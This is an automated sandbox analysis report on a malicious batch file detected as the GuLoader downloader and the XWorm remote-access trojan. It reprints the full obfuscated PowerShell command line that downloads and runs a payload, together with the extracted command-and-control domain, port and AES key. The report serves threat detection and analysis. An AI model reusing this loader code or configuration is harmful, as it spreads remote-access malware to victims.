Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zap.cmd

Overview

General Information

Sample name:zap.cmd
Analysis ID:1446788
MD5:5521519d477ec8b95c87ad7ffc115145
SHA1:551da12ea131d7bf60646a35cfcd8a3a16905f94
SHA256:3a399d16db8e57cf727a03f4d9ad33624c08571c0f0b2e4120095e4622c22e19
Tags:cmd
Infos:

Detection

GuLoader, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6480 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5092 cmdline: powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico Aggri B ofdUnd.r.Go wiDTv.faoTriplwSk.tenBas slDot.noUnrubaPhysidAn,roFSuperi.alacl oreaeTande(Offer$AttraL Stito Rep.dP.rnod.xhaleBajonnFjerndNonreeStrans Swea,Hyper$Gi,lyBThermrSofa a VelknBesprdAfgift pu.raUnatulMoraletorp.rBaga.nForvieTanke)Blsop ';$Brandtalerne=$Boglrdes[0];Smrkers (hdrede ' Nati$Namarg ,dkllG,ainoKontrbUndera.kidel.seud:cauldWModele unids EmbrlCoa,jeEnodayCivicij,llasOvnlamRewei9N.rma0Buffi=Overt( t afTMagtbeE,linsEf,ustIndsm-HushoPsamplaPhthatConvihAutoc Kinne$ContrBStenorNonseaBlkklnOxhordUngautCivila CoralrenteeGlimrrWal mnVeugleInsim)Cyc o ');while (!$Wesleyism90) {Smrkers (hdrede 'Legum$Mandag DivelFraadopro.abConsua Jagtl Torf:Tug eAUddykuSu ulmSlowfaSpy.kgMutuaaGl,tt=Sp.se$SolistFugtfr ndsiuSoviee pun ') ;Smrkers $Emplanes;Smrkers (hdrede 'neuroS,ugtutGoldsa.ylesrRaf,itErsta- Vat,SU,envlTr,moeNringeSakulpM chi Efflo4For,r ');Smrkers (hdrede 'Behag$ jemvg,rammlTrompo RulabGavlhahage,lSamsp:G.addW And egablesRotunl Paroe Ta,syCentriSerboscercimF.rbu9Aboli0 har=f rme( DiscTTo pleSagfrsDob,etFlerv-Rund.PSammeaSkylltYndigh Bn s svovl$Ttn nBSax fr,reinaDeo ynBajadd Benjt.rochaStubblPretreUnconr ,hennIre eeTintn)Infes ') ;Smrkers (hdrede 'Panno$huen,g Va,dl adreo Kr sbAmbosa StrilStryg:Tro aNEkstraRododb S raoStarti KoranAlabatSighteKursurOarl.vGunvoaRebapl Em,slMontreAnorct OmsvsU sty=Aaleg$Re.tigGuidolOrienoPolstbUndosaTi kllLejli:KorntPDeambrComp t SubheooblanMinictMiddliYunkesLagertOdyss+Da,ha+Hj.es% Wood$ZulhiS.nempoBarbemTserbmFelaheWel,er,ashhfGhaneu.ipargHerenlOpnaaeSalgsmFuldmoFettsdSvigteErgo.lTereslPerfue DiserGoorosNepa..Toccac Forno S mtuEkspon BagltTermo ') ;$Loddendes=$Sommerfuglemodellers[$Nabointervallets];}$Programpakke=340015;$Leath=26897;Smrkers (hdrede ',kris$HypergCoopelKnaldoUmorabGtersaKvintlF.ail:Sdes CNringoForb.nScir fIncurlSixmoa .isctBenedeHanga Destr= Indo ScrumGTe.hne AlqutTae i-LkkerC AnveoAeolon CholtC ocaeUltran.rstetPeace Raptu$varieBU prer AppeaByvaan LngddKn trtSkue.aGramml B.lteU.derrSpacin Bofoe Brak ');Smrkers (hdrede 'Raket$.oknigRebral TabeoCephab.oophaUdboml Bass:PraetAForrelDoku bGenreiTeamen SvovoAcc,lePox.nn Capa Acron=Overs Ge,ni[DokumS.nwaly steosDybdetForskeImponmSmede.R sciC HippoKorrentringvAfnazeimperrShohetRampo]Idiom:Super:L,phiFGill.r Sunso Tranm BidrB.leipaAtom,sUnpure Vika6 est4ElectS Pip.tTroldrM,croi WadmnP tgigPand.(Pter,$ TracC Ko.goSped.nPilhefSemiflRin,ea BrantJordve.aane)Dodec ');Smrkers (hdrede ' Unla$SpheggH ngal SpiloTylotbFor,aa FlytlD rth:Unna,AFordomUnsapp KenyuIdolit SoejeVar.ledogm sLokal .icqu=Deorb Trime[BarkaSbenv.yOverdsMonomtDissee ummmSagsk.UfrihT A.fdeS lidxArcadtjeapo.SalthEGl.ednSiv rcForgeoUmbosdBronciWate,n De.og,idym]Kunde:Dis,e:MoeriASangdSBurlaCReachI limI,ohor.DentiGUnmapeObliqtM.edsS EleptEndosrS.guaiDiakon Undegvitro(Unp,r$ProduAnonanl Drbeb ,horiE tern WankoInt,reUnsysnFo be)Etats ');Smrkers (hdrede 'Frank$NorthgNobl lUdlaao,agplbStudea serolTuber: BiofAFilipl KissvNonnaa Lo an Mikk= Nat $Sej tA asermOvercpMonjauEquiltSi hoeBastaeStnkesChapp.UnremsMicr uChirobC.rvisMa ultUdsgnrHeinriInconnIgl egVene.(Handw$BlitzPQuipsrHjemmo sa vgHab.trHalola RechmPelsdpInsalaUnc lkAbdickSuseneLowwo, Angr$ UninLTilvre E traneglitResishRedni)C.ssa ');Smrkers $Alvan;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 500 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5144 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico Aggri B ofdUnd.r.Go wiDTv.faoTriplwSk.tenBas slDot.noUnrubaPhysidAn,roFSuperi.alacl oreaeTande(Offer$AttraL Stito Rep.dP.rnod.xhaleBajonnFjerndNonreeStrans Swea,Hyper$Gi,lyBThermrSofa a VelknBesprdAfgift pu.raUnatulMoraletorp.rBaga.nForvieTanke)Blsop ';$Brandtalerne=$Boglrdes[0];Smrkers (hdrede ' Nati$Namarg ,dkllG,ainoKontrbUndera.kidel.seud:cauldWModele unids EmbrlCoa,jeEnodayCivicij,llasOvnlamRewei9N.rma0Buffi=Overt( t afTMagtbeE,linsEf,ustIndsm-HushoPsamplaPhthatConvihAutoc Kinne$ContrBStenorNonseaBlkklnOxhordUngautCivila CoralrenteeGlimrrWal mnVeugleInsim)Cyc o ');while (!$Wesleyism90) {Smrkers (hdrede 'Legum$Mandag DivelFraadopro.abConsua Jagtl Torf:Tug eAUddykuSu ulmSlowfaSpy.kgMutuaaGl,tt=Sp.se$SolistFugtfr ndsiuSoviee pun ') ;Smrkers $Emplanes;Smrkers (hdrede 'neuroS,ugtutGoldsa.ylesrRaf,itErsta- Vat,SU,envlTr,moeNringeSakulpM chi Efflo4For,r ');Smrkers (hdrede 'Behag$ jemvg,rammlTrompo RulabGavlhahage,lSamsp:G.addW And egablesRotunl Paroe Ta,syCentriSerboscercimF.rbu9Aboli0 har=f rme( DiscTTo pleSagfrsDob,etFlerv-Rund.PSammeaSkylltYndigh Bn s svovl$Ttn nBSax fr,reinaDeo ynBajadd Benjt.rochaStubblPretreUnconr ,hennIre eeTintn)Infes ') ;Smrkers (hdrede 'Panno$huen,g Va,dl adreo Kr sbAmbosa StrilStryg:Tro aNEkstraRododb S raoStarti KoranAlabatSighteKursurOarl.vGunvoaRebapl Em,slMontreAnorct OmsvsU sty=Aaleg$Re.tigGuidolOrienoPolstbUndosaTi kllLejli:KorntPDeambrComp t SubheooblanMinictMiddliYunkesLagertOdyss+Da,ha+Hj.es% Wood$ZulhiS.nempoBarbemTserbmFelaheWel,er,ashhfGhaneu.ipargHerenlOpnaaeSalgsmFuldmoFettsdSvigteErgo.lTereslPerfue DiserGoorosNepa..Toccac Forno S mtuEkspon BagltTermo ') ;$Loddendes=$Sommerfuglemodellers[$Nabointervallets];}$Programpakke=340015;$Leath=26897;Smrkers (hdrede ',kris$HypergCoopelKnaldoUmorabGtersaKvintlF.ail:Sdes CNringoForb.nScir fIncurlSixmoa .isctBenedeHanga Destr= Indo ScrumGTe.hne AlqutTae i-LkkerC AnveoAeolon CholtC ocaeUltran.rstetPeace Raptu$varieBU prer AppeaByvaan LngddKn trtSkue.aGramml B.lteU.derrSpacin Bofoe Brak ');Smrkers (hdrede 'Raket$.oknigRebral TabeoCephab.oophaUdboml Bass:PraetAForrelDoku bGenreiTeamen SvovoAcc,lePox.nn Capa Acron=Overs Ge,ni[DokumS.nwaly steosDybdetForskeImponmSmede.R sciC HippoKorrentringvAfnazeimperrShohetRampo]Idiom:Super:L,phiFGill.r Sunso Tranm BidrB.leipaAtom,sUnpure Vika6 est4ElectS Pip.tTroldrM,croi WadmnP tgigPand.(Pter,$ TracC Ko.goSped.nPilhefSemiflRin,ea BrantJordve.aane)Dodec ');Smrkers (hdrede ' Unla$SpheggH ngal SpiloTylotbFor,aa FlytlD rth:Unna,AFordomUnsapp KenyuIdolit SoejeVar.ledogm sLokal .icqu=Deorb Trime[BarkaSbenv.yOverdsMonomtDissee ummmSagsk.UfrihT A.fdeS lidxArcadtjeapo.SalthEGl.ednSiv rcForgeoUmbosdBronciWate,n De.og,idym]Kunde:Dis,e:MoeriASangdSBurlaCReachI limI,ohor.DentiGUnmapeObliqtM.edsS EleptEndosrS.guaiDiakon Undegvitro(Unp,r$ProduAnonanl Drbeb ,horiE tern WankoInt,reUnsysnFo be)Etats ');Smrkers (hdrede 'Frank$NorthgNobl lUdlaao,agplbStudea serolTuber: BiofAFilipl KissvNonnaa Lo an Mikk= Nat $Sej tA asermOvercpMonjauEquiltSi hoeBastaeStnkesChapp.UnremsMicr uChirobC.rvisMa ultUdsgnrHeinriInconnIgl egVene.(Handw$BlitzPQuipsrHjemmo sa vgHab.trHalola RechmPelsdpInsalaUnc lkAbdickSuseneLowwo, Angr$ UninLTilvre E traneglitResishRedni)C.ssa ');Smrkers $Alvan;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2268 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 2948 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["tbsagyw.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.3376138960.0000000023191000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000006.00000002.2615577920.0000000008440000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000006.00000002.2609130468.000000000573F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000006.00000002.2616022619.000000000A044000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000003.00000002.2834421548.0000024C677EE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 6 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_5092.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_5144.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xdfd9:$b2: ::FromBase64String(
              • 0xd0b2:$s1: -join
              • 0x685e:$s4: +=
              • 0x6920:$s4: +=
              • 0xab47:$s4: +=
              • 0xcc64:$s4: +=
              • 0xcf4e:$s4: +=
              • 0xd094:$s4: +=
              • 0x1677c:$s4: +=
              • 0x167fc:$s4: +=
              • 0x168c2:$s4: +=
              • 0x16942:$s4: +=
              • 0x16b18:$s4: +=
              • 0x16b9c:$s4: +=
              • 0xd881:$e4: Get-WmiObject
              • 0xda70:$e4: Get-Process
              • 0xdac8:$e4: Start-Process
              • 0x1529d:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico

              Snort Signatures

              Timestamp:05/23/24-21:14:15.572246
              SID:2852923
              Source Port:49724
              Destination Port:8896
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/23/24-21:14:15.571396
              SID:2852870
              Source Port:8896
              Destination Port:49724
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/23/24-21:13:17.087470
              SID:2855924
              Source Port:49724
              Destination Port:8896
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/23/24-21:14:05.945641
              SID:2852874
              Source Port:8896
              Destination Port:49724
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Found malware configuration
              Source: 0000000C.00000002.3376138960.0000000023191000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["tbsagyw.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.6:49721 version: TLS 1.2
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2614520211.000000000812D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2611736999.0000000007092000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb_ source: powershell.exe, 00000006.00000002.2614520211.0000000008120000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2611736999.0000000007092000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb( source: powershell.exe, 00000006.00000002.2614520211.000000000812D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2611736999.0000000007092000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2614936555.0000000008173000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb' source: powershell.exe, 00000006.00000002.2591214496.00000000029EC000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
